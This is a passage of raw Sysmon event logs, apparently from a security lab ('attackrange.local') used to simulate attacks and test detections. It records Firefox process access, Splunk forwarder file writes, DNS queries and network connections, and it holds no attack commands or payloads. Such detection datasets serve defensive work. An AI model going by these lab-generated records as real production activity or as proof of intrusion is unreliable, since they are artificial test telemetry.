Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+a0d439|C:\Program Files\Mozilla Firefox\xul.dll+a0d35a|C:\Program Files\Mozilla Firefox\xul.dll+a0cf49|C:\Program Files\Mozilla Firefox\xul.dll+a090df|C:\Program Files\Mozilla Firefox\xul.dll+a093ec|C:\Program Files\Mozilla Firefox\xul.dll+b55c5a|C:\Program Files\Mozilla Firefox\xul.dll+2d9649|C:\Program Files\Mozilla Firefox\xul.dll+2d9554|C:\Program Files\Mozilla Firefox\xul.dll+2d933d|C:\Program Files\Mozilla Firefox\xul.dll+2d91d4|C:\Program Files\Mozilla Firefox\xul.dll+ba1993|C:\Program Files\Mozilla Firefox\xul.dll+ba2691|C:\Program Files\Mozilla Firefox\xul.dll+ba168d|C:\Program Files\Mozilla Firefox\xul.dll+ba15e2|C:\Program Files\Mozilla Firefox\xul.dll+b723b2|C:\Program Files\Mozilla Firefox\xul.dll+1a1b580|C:\Program Files\Mozilla Firefox\xul.dll+b78344|C:\Program Files\Mozilla Firefox\xul.dll+fca4c4|C:\Program Files\Mozilla Firefox\xul.dll+f36457|C:\Program Files\Mozilla Firefox\xul.dll+2cbfda 10341000x80000000000000001051216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:47.270{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B40-6151-3F78-00000000FC01}6828C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2fb50|C:\Program Files\Mozilla Firefox\xul.dll+e4cd19|C:\Program Files\Mozilla Firefox\xul.dll+e4c727|C:\Program Files\Mozilla Firefox\xul.dll+8b9000|C:\Program Files\Mozilla Firefox\xul.dll+8ad3ed|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979856Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:48.615{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07A203EB4FC48137F0E6AC984A302BE1,SHA256=A0E9F378FB30640BC5B063AED981F70A6A032E181070C03E3ABE76AA7D8D2A1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979855Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:48.615{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B12786FFC54C4605F91839004C5BDF66,SHA256=8775206CBAF7F880224241FCB786B6A5EC7EF657DD9F5C6E5A09393E9C617119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979854Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:48.521{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A2F05FCA15A91A4E0E363903E3A4696,SHA256=D0C3FB35D644D74F2EDA2CA638267A878B797D7A4C96EB2616FDA329E8C2AC2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.629{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=713923F99FE1284D43EFDCF80B5418DB,SHA256=EF1F5789FE1667AEB9F796A90F61A1BE813F2F13696F20407E615D00653211A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979853Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:44.802{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59443-false10.0.1.12-8000- 10341000x80000000000000001051237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.739{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.730{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.729{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.729{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.727{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 10341000x80000000000000001051232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.727{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 23542300x80000000000000001051231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.705{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cache2\doomed\4077MD5=C046AB9DBCA84E83485834C1D337FB31,SHA256=7CEB64E2978DF1D5C2CC286694388CC33C46AB6A5F22EF3166A96E114491CA38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.635{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA5100B81C7DF7AC7B061CA9BF555F92,SHA256=D89D02895FFD2BE95B7FB44E2607A05D3FC650563A7F384E441C061216BD405B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.631{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979858Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:49.537{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=804BE8B30CD021AC690A4F1386EF0739,SHA256=017F3E6DDC8DCE42A0AA772220AFC0EDEAB2F5103C89D16587616593E0E0C1EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979857Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:45.620{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-59313-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001051228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.144{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55882- 354300x80000000000000001051227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.144{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local64464-false142.250.185.132fra16s50-in-f4.1e100.net443https 354300x80000000000000001051226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.143{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53522- 22542200x80000000000000001051225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.455{5EBD8912-7B3A-6151-3A78-00000000FC01}7120www.google.com02a00:1450:4001:82f::2004;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001051224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.216{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.216{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.193{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.193{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.028{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\formhistory.sqlite-journalMD5=FC78118EC59BA5F98DC60337F4C908AD,SHA256=70D6E4D57184DF5C29CF61B34F759A78D3DFB15C7F36CB0AE34D971809B1FF14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979859Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:50.537{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40920A480BED5C7E4B134328972C7905,SHA256=5B8856B916C93A05D38345F7C327510177C233AA2340D3FB6CDE51AFDB7459F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.900{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53441-false13.224.193.14server-13-224-193-14.fra2.r.cloudfront.net443https 354300x80000000000000001051254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.899{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local54856-false142.250.186.163fra24s08-in-f3.1e100.net443https 354300x80000000000000001051253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.896{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local58847- 354300x80000000000000001051252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.895{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53847- 354300x80000000000000001051251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.891{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54855- 354300x80000000000000001051250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.889{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local59156- 10341000x80000000000000001051249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.310{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 10341000x80000000000000001051248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.287{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.256{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cache2\doomed\24142MD5=A310FE921D9A13696D7091960AE87516,SHA256=86E7D58AD1040E35A229E15E71C58B6176FABFD2402A6B7EAC147081AD8F0161,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.741{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53440-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001051245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.699{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local58861- 354300x80000000000000001051244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.697{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55191- 354300x80000000000000001051243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.693{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT 